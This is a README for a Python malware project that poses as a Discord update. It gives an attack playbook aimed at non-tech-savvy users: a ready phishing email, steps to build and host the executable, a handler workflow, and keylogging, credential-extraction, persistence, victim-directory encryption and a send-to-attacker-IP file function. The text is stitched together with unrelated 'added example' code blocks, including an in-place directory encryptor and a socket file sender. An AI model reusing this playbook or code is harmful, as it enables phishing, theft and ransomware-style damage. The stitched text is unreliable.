
The s0P0wn3d project demonstrates various techniques for file transfer, persistence, and system information extraction using Python.


Sauron-sol/s0P0wn3d


s0P0wn3d 🦠

s0P0wn3d is a Python project that demonstrates techniques for file transfer, persistence, and system information extraction; in the scenario below the payload is delivered to the victim as a fake Discord update.

Project Structure 📂

    .
    ├── analysis_results
    ├── .gitignore
    ├── README.md
    ├── T-SEC-901_project.pdf
    ├── custom_handler.py
    ├── discord.py
    ├── receive_file.py
    └── system_info.log

Features ✨

  • File Transfer: Send and receive files over a network.
  • Persistence: Ensure the script runs on system startup.
  • System Information Extraction: Extract and log system information.
  • Tunnel Management: List and switch between active tunnels.
  • Directory & File Encryption: Encrypt and decrypt directories or files on the victim's machine.
  • Keylogger: Capture keystrokes in the background.
  • Sensitive File Extraction: Automatically search and retrieve files containing sensitive data.
  • Log Analysis: Analyze system logs and generate visualizations via custom_handler.py.
  • Command Management & Help: An improved command parser that handles Ctrl+C safely and provides a help menu.

Usage 🚀

Target 🎯

The target for this attack scenario is individual Discord users, particularly those who are not tech-savvy and may not recognize phishing attempts. This could include casual gamers, students, or employees in small businesses who use Discord for communication.

Attack Scenario ⚔️

Attacker Side 🕵️‍♂️

  1. Configure the IP Address: Edit discord.py to include the attacker's IP address.

  2. Create Malicious Executable: Use PyInstaller to create an executable from discord.py.

    pyinstaller discord.py
  3. Host Fake Web Page: Host a fake web page where the victim can download the malicious executable.

  4. Start Handlers: Open two terminals and run the following commands:

    • Terminal 1: Start the custom handler.
      python custom_handler.py
    • Terminal 2: Start the file receiver.
      python receive_file.py

Victim Side 👤

  1. Receive Phishing Email: The victim receives a phishing email prompting them to update their Discord application.

Example Phishing Email:

Subject: Important: Discord Update Required

Dear Discord User,

We have detected that your current version of Discord is outdated and may contain security vulnerabilities. To ensure the best performance and security, please update your Discord application immediately.

Click the link below to download the latest version:
[Download Discord Update](http://localhost:5050)

Thank you for your prompt attention to this matter.

Best regards,
Discord Support Team
  2. Download Malicious Executable: The victim clicks on the link in the email, which leads to the fake web page, and downloads the malicious executable.
  3. Execute the File: The victim runs the downloaded executable, believing it to be a legitimate Discord update.
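The email above carries the indicators a mail filter or a trained user would key on: a generic greeting, urgency wording, a plain-http link, and a "Discord" link whose host is not a Discord domain. The following is an added example (not part of the s0P0wn3d project) that runs those checks over the scenario's own message; the brand allow-list (`discord.com`, `discordapp.com`), the urgency phrase list and the indicator names are assumptions chosen for the illustration.

```python
from __future__ import annotations

import re
from urllib.parse import urlsplit

# Constructed sample input: the phishing email from the scenario, as a raw message.
SAMPLE_EMAIL = """Subject: Important: Discord Update Required

Dear Discord User,

We have detected that your current version of Discord is outdated and may contain security vulnerabilities. To ensure the best performance and security, please update your Discord application immediately.

Click the link below to download the latest version:
[Download Discord Update](http://localhost:5050)

Thank you for your prompt attention to this matter.

Best regards,
Discord Support Team
"""

BRAND = "discord"
BRAND_DOMAINS = ("discord.com", "discordapp.com")  # assumed allow-list for the impersonated brand
URGENCY_PHRASES = ("immediately", "required", "prompt attention", "urgent", "will be suspended")
MD_LINK_RE = re.compile(r"\[([^\]]+)\]\((\S+?)\)")        # [anchor text](url)
BARE_URL_RE = re.compile(r"https?://[^\s)\]>]+")          # URLs pasted without markup
GENERIC_GREETING_RE = re.compile(r"^dear\s+(valued\s+)?\w+\s+(user|customer|member)\b", re.I)


def _is_brand_host(host: str) -> bool:
    return any(host == d or host.endswith("." + d) for d in BRAND_DOMAINS)


def extract_links(text: str) -> list[tuple[str, str]]:
    """Return (anchor text, URL) pairs; bare URLs get an empty anchor."""
    links = MD_LINK_RE.findall(text)
    seen = {url for _, url in links}
    links += [("", url) for url in BARE_URL_RE.findall(text) if url not in seen]
    return links


def phishing_indicators(raw: str) -> list[str]:
    """Each returned string is one indicator; an empty list means nothing was flagged."""
    headers, _, body = raw.partition("\n\n")
    subject = next((h.split(":", 1)[1].strip() for h in headers.splitlines()
                    if h.lower().startswith("subject:")), "")
    findings: list[str] = []
    if GENERIC_GREETING_RE.match(body.strip()):
        findings.append("generic-greeting")
    lowered = (subject + "\n" + body).lower()
    hits = [p for p in URGENCY_PHRASES if p in lowered]
    if hits:
        findings.append("urgency:" + ",".join(hits))
    for anchor, url in extract_links(body):
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        if parts.scheme != "https":
            findings.append(f"plain-http:{url}")
        if host == "localhost" or re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
            findings.append(f"non-public-host:{host}")
        # The visible text (or the subject) names the brand but the link leaves its domain.
        if BRAND in (anchor + " " + subject).lower() and not _is_brand_host(host):
            findings.append(f"brand-link-offsite:{host}")
    return findings


if __name__ == "__main__":
    for finding in phishing_indicators(SAMPLE_EMAIL):
        print(finding)
```

The host check is the one that survives a more polished lure: wording and greeting can be tidied up, but a download link for "Discord" that does not resolve under a Discord domain is a hard mismatch, and in the scenario the link even points at `localhost:5050`.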

Post-Execution 🔍

  1. List Available Tunnels: On the attacker's terminal running custom_handler.py, list available tunnels.

    list_tunnels
  2. Switch Tunnels: Switch to the desired tunnel.

    switch_tunnels <ID>
  3. Access Victim's Terminal: Gain access to the victim's terminal through the tunnel.

  4. Encrypt Directories: Encrypt a directory on the victim's machine.

    encrypt <DIR> <PASSWORD>
  5. Decrypt Directories: Decrypt a directory on the victim's machine.

    decrypt <DIR> <PASSWORD>
  6. Analyze Logs: Analyze system logs and generate visualizations.

    analyze_logs
  7. Exit: Close the active tunnel.

    exit
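The `encrypt <DIR> <PASSWORD>` / `decrypt <DIR> <PASSWORD>` commands turn a password into file encryption, and the two properties that decide whether such a feature is sound are how the password becomes a key (salted, slow derivation) and whether a wrong password or a tampered file is detected before anything is overwritten. The following is an added example (not the project's code; the README does not describe its container format or cipher) that implements password-based directory encryption with those properties using only the standard library: scrypt for key derivation, an HMAC-SHA256 counter-mode keystream as the cipher, and encrypt-then-MAC with verification before decryption. The `S0P0ENC1` header marker, the `.enc` suffix and the scrypt parameters are assumptions for the illustration.

```python
from __future__ import annotations

import hashlib
import hmac
import os
import struct
import tempfile
from pathlib import Path

MAGIC = b"S0P0ENC1"  # assumed container marker; not the project's on-disk format
SALT_LEN, NONCE_LEN, TAG_LEN = 16, 16, 32
HDR_LEN = len(MAGIC) + SALT_LEN + NONCE_LEN


def _derive_keys(password: str, salt: bytes) -> tuple[bytes, bytes]:
    # scrypt is salted and memory-hard: the same password yields a different key per
    # file, and offline guessing costs the attacker real memory and time.
    km = hashlib.scrypt(password.encode("utf-8"), salt=salt, n=2**14, r=8, p=1, dklen=64)
    return km[:32], km[32:]  # (encryption key, MAC key)


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    # HMAC-SHA256 in counter mode as a PRF keystream, chosen only so the example runs
    # without third-party packages; production code should use AES-GCM or
    # ChaCha20-Poly1305 from the `cryptography` package.
    blocks = [hmac.new(key, nonce + struct.pack("!Q", i), hashlib.sha256).digest()
              for i in range((length + 31) // 32)]
    return b"".join(blocks)[:length]


def _xor(a: bytes, b: bytes) -> bytes:
    return (int.from_bytes(a, "big") ^ int.from_bytes(b, "big")).to_bytes(len(a), "big")


def encrypt_bytes(plaintext: bytes, password: str) -> bytes:
    salt, nonce = os.urandom(SALT_LEN), os.urandom(NONCE_LEN)
    enc_key, mac_key = _derive_keys(password, salt)
    header = MAGIC + salt + nonce
    ct = _xor(plaintext, _keystream(enc_key, nonce, len(plaintext)))
    tag = hmac.new(mac_key, header + ct, hashlib.sha256).digest()  # encrypt-then-MAC
    return header + ct + tag


def decrypt_bytes(blob: bytes, password: str) -> bytes:
    if len(blob) < HDR_LEN + TAG_LEN or not blob.startswith(MAGIC):
        raise ValueError("not a container produced by encrypt_bytes")
    header, ct, tag = blob[:HDR_LEN], blob[HDR_LEN:-TAG_LEN], blob[-TAG_LEN:]
    salt = header[len(MAGIC):len(MAGIC) + SALT_LEN]
    nonce = header[len(MAGIC) + SALT_LEN:]
    enc_key, mac_key = _derive_keys(password, salt)
    expected = hmac.new(mac_key, header + ct, hashlib.sha256).digest()
    # Verify before decrypting: a wrong password or a modified file is rejected
    # outright instead of silently producing garbage.
    if not hmac.compare_digest(expected, tag):
        raise ValueError("wrong password or tampered data")
    return _xor(ct, _keystream(enc_key, nonce, len(ct)))


def is_valid(blob: bytes, password: str) -> bool:
    """True if the tag verifies under this password (cheap pre-check before a batch decrypt)."""
    try:
        decrypt_bytes(blob, password)
        return True
    except ValueError:
        return False


def encrypt_dir(directory: str, password: str, suffix: str = ".enc") -> list[str]:
    """Encrypt every regular file under directory in place; the original is removed only
    after the encrypted copy is fully written. Returns the encrypted paths."""
    done = []
    for path in sorted(p for p in Path(directory).rglob("*") if p.is_file() and p.suffix != suffix):
        out = path.with_name(path.name + suffix)
        out.write_bytes(encrypt_bytes(path.read_bytes(), password))
        path.unlink()
        done.append(str(out))
    return done


def decrypt_dir(directory: str, password: str, suffix: str = ".enc") -> list[str]:
    """Inverse of encrypt_dir; every file is verified before any file is touched."""
    targets = sorted(p for p in Path(directory).rglob("*" + suffix) if p.is_file())
    plaintexts = [decrypt_bytes(p.read_bytes(), password) for p in targets]  # all-or-nothing
    done = []
    for path, data in zip(targets, plaintexts):
        out = path.with_name(path.name[: -len(suffix)])
        out.write_bytes(data)
        path.unlink()
        done.append(str(out))
    return done


def demo(password: str = "correct horse battery staple") -> dict:
    """Constructed run in a temporary directory: encrypt, reject a wrong password, restore."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "notes.txt").write_bytes(b"constructed sample note\n")
        (root / "sub").mkdir()
        (root / "sub" / "keys.csv").write_bytes(b"user,token\nalice,abc123\n")
        encrypted = encrypt_dir(d, password)
        try:
            decrypt_dir(d, "wrong password")
            wrong_rejected = False
        except ValueError:
            wrong_rejected = True
        intact = all(Path(p).exists() for p in encrypted)
        restored = decrypt_dir(d, password)
        return {"encrypted": sorted(Path(p).name for p in encrypted),
                "wrong_password_rejected": wrong_rejected,
                "encrypted_files_intact": intact,
                "restored": {Path(p).name: Path(p).read_bytes() for p in restored}}


if __name__ == "__main__":
    print(demo())
```

The all-or-nothing check in `decrypt_dir` matters operationally: with a wrong password, nothing is written and the `.enc` files stay as they were, whereas a decryptor that overwrites as it goes would leave a half-restored tree of garbage after the first bad file.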

Sending Files 📤

To send a file to the receiver (receiver IP, receiver port 4445, then the local path), use the send_file function in s0P0wn3d.py:

send_file("IP", 4445, "path/to/file")
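The README gives the `send_file(host, port, path)` signature and a `receive_file.py` listener but not the wire format between them, and with raw sockets the points that matter are framing (TCP delivers a byte stream, not messages), short reads, integrity, and not letting the sender choose where the receiver writes. The following is an added example (not the project's code) of a sender and receiver pair using an assumed length-prefixed format: 4-byte name length, file name, 8-byte file size, 32-byte SHA-256, then the contents. The `roundtrip` helper runs both ends over loopback on an ephemeral port with constructed data.

```python
from __future__ import annotations

import hashlib
import socket
import struct
import tempfile
import threading
from pathlib import Path

# Assumed wire format (receive_file.py's real framing is not documented in the README):
#   4-byte name length | file name (UTF-8) | 8-byte file size | 32-byte SHA-256 | contents
NAME_LEN = struct.Struct("!I")
FILE_LEN = struct.Struct("!Q")
CHUNK = 64 * 1024


def _recv_exact(conn: socket.socket, n: int) -> bytes:
    """Read exactly n bytes; TCP recv() may legally return fewer than requested."""
    buf = bytearray()
    while len(buf) < n:
        part = conn.recv(n - len(buf))
        if not part:
            raise ConnectionError("peer closed the connection early")
        buf += part
    return bytes(buf)


def safe_name(raw: str) -> str:
    """Keep only the final path component so a sender cannot pick the destination directory."""
    name = Path(raw.replace("\\", "/")).name
    return name if name not in ("", ".", "..") else "unnamed"


def send_file(host: str, port: int, path: str) -> str:
    """Send one file; returns the SHA-256 hex digest that was transmitted with it."""
    src = Path(path)
    digest = hashlib.sha256(src.read_bytes()).digest()  # hashed up front for the header
    name = src.name.encode("utf-8")
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(NAME_LEN.pack(len(name)) + name + FILE_LEN.pack(src.stat().st_size) + digest)
        with src.open("rb") as f:
            while chunk := f.read(CHUNK):
                s.sendall(chunk)
    return digest.hex()


def receive_file(conn: socket.socket, out_dir: str) -> tuple[str, bool]:
    """Receive one file into out_dir; returns (written path, digest matched)."""
    (name_len,) = NAME_LEN.unpack(_recv_exact(conn, NAME_LEN.size))
    name = safe_name(_recv_exact(conn, name_len).decode("utf-8", "replace"))
    (size,) = FILE_LEN.unpack(_recv_exact(conn, FILE_LEN.size))
    expected = _recv_exact(conn, 32)
    dest = Path(out_dir) / name
    h = hashlib.sha256()
    remaining = size
    with dest.open("wb") as f:
        while remaining:
            part = conn.recv(min(CHUNK, remaining))
            if not part:
                raise ConnectionError("transfer truncated")
            f.write(part)
            h.update(part)
            remaining -= len(part)
    return str(dest), h.digest() == expected


def roundtrip(data: bytes, name: str = "sample.bin") -> dict:
    """Constructed end-to-end run over loopback: receiver thread on an ephemeral port, then send."""
    with tempfile.TemporaryDirectory() as src_dir, tempfile.TemporaryDirectory() as dst_dir:
        src = Path(src_dir) / name
        src.write_bytes(data)
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.bind(("127.0.0.1", 0))
        srv.listen(1)
        port = srv.getsockname()[1]
        result: dict = {}

        def receiver() -> None:
            conn, _ = srv.accept()
            with conn:
                path, ok = receive_file(conn, dst_dir)
            result["ok"] = ok
            result["name"] = Path(path).name
            result["data"] = Path(path).read_bytes()

        t = threading.Thread(target=receiver, daemon=True)
        t.start()
        result["sent_sha256"] = send_file("127.0.0.1", port, str(src))
        t.join(timeout=10)
        srv.close()
        return result


if __name__ == "__main__":
    r = roundtrip(b"constructed payload " * 5000)
    print(r["name"], len(r["data"]), "integrity ok:", r["ok"])
```

`safe_name` is the check a receiver exposed on a port needs most: without it, a name such as `../../.bashrc` in the header lets whoever connects write anywhere the handler's user can.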

Extracting System Information 🖥️

To extract system information, use the extract_credentials function in s0P0wn3d.py:

extract_credentials()

Ensuring Persistence 🔄

To ensure the script runs on system startup, use the ensure_persistence function in s0P0wn3d.py:

ensure_persistence()
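The README does not say which mechanism `ensure_persistence()` uses, so the useful companion on the defender's side is an inventory of the user-level locations a "run at startup" routine typically writes to. The following is an added example (not the project's code) that enumerates XDG autostart `.desktop` files, the per-user Windows Startup folder and `@reboot` crontab lines under a given home directory, and flags entries that launch from temp or download directories or that drop a raw executable rather than a shortcut into the Startup folder. The locations, the suspicious-directory list and the `demo` fixture are assumptions for the illustration.

```python
from __future__ import annotations

import configparser
import tempfile
from pathlib import Path

# Assumed set of user-level persistence locations (the README does not describe
# what ensure_persistence() writes).
WINDOWS_STARTUP = Path("AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup")
XDG_AUTOSTART = Path(".config/autostart")
# Directories a legitimate autostart entry rarely launches from (assumed list).
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/downloads/", "/appdata/local/temp/")
SCRIPT_EXTS = (".exe", ".bat", ".cmd", ".vbs", ".ps1", ".py")


def xdg_autostart_entries(home: Path) -> list[dict]:
    """Parse ~/.config/autostart/*.desktop; Exec= is the command run at desktop login."""
    entries = []
    for f in sorted((home / XDG_AUTOSTART).glob("*.desktop")):
        cp = configparser.ConfigParser(interpolation=None, strict=False)
        cp.optionxform = str  # keep key case: "Exec", not "exec"
        cp.read(f, encoding="utf-8")
        if not cp.has_section("Desktop Entry"):
            continue
        if cp.get("Desktop Entry", "Hidden", fallback="false").lower() == "true":
            continue  # Hidden=true disables the entry
        entries.append({"source": str(f), "command": cp.get("Desktop Entry", "Exec", fallback="")})
    return entries


def windows_startup_entries(home: Path) -> list[dict]:
    """Files dropped into the per-user Startup folder; each one runs at logon."""
    folder = home / WINDOWS_STARTUP
    if not folder.is_dir():
        return []
    return [{"source": str(f), "command": str(f)} for f in sorted(folder.iterdir())]


def crontab_reboot_entries(crontab_text: str, source: str = "crontab") -> list[dict]:
    """@reboot lines from a user's crontab (the text `crontab -l` prints)."""
    out = []
    for line in crontab_text.splitlines():
        fields = line.strip().split(None, 1)
        if len(fields) == 2 and fields[0] == "@reboot":
            out.append({"source": source, "command": fields[1].strip()})
    return out


def flag_suspicious(entries: list[dict]) -> list[dict]:
    """Entries launching from a temp/download directory, or raw executables in Startup."""
    flagged = []
    for e in entries:
        cmd = e["command"].replace("\\", "/").lower()
        raw_exe_in_startup = "/startup/" in cmd and cmd.endswith(SCRIPT_EXTS)
        if any(d in cmd for d in SUSPICIOUS_DIRS) or raw_exe_in_startup:
            flagged.append(e)
    return flagged


def demo() -> dict:
    """Constructed home directory with one benign and one suspicious entry per location."""
    with tempfile.TemporaryDirectory() as d:
        home = Path(d)
        auto = home / XDG_AUTOSTART
        auto.mkdir(parents=True)
        (auto / "nm-applet.desktop").write_text(
            "[Desktop Entry]\nType=Application\nName=Network\nExec=/usr/bin/nm-applet\n")
        (auto / "discord-update.desktop").write_text(
            "[Desktop Entry]\nType=Application\nName=Discord\nExec=/home/victim/Downloads/discord_update\n")
        startup = home / WINDOWS_STARTUP
        startup.mkdir(parents=True)
        (startup / "discord.exe").write_bytes(b"MZ constructed stub")
        entries = xdg_autostart_entries(home) + windows_startup_entries(home)
        entries += crontab_reboot_entries("@reboot /tmp/.cache/discord_update\n0 5 * * * /usr/bin/backup\n")
        return {"total": len(entries), "flagged": [e["command"] for e in flag_suspicious(entries)]}


if __name__ == "__main__":
    print(demo())
```

Run the real thing with `xdg_autostart_entries(Path.home())` or `windows_startup_entries(Path.home())` on the machine under review and feed `crontab -l` output to `crontab_reboot_entries`; the Windows `Run` registry keys are the other common user-level location and need `winreg`, which this stdlib-on-any-OS example leaves out.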

License 📜

This project is intended for educational purposes only.
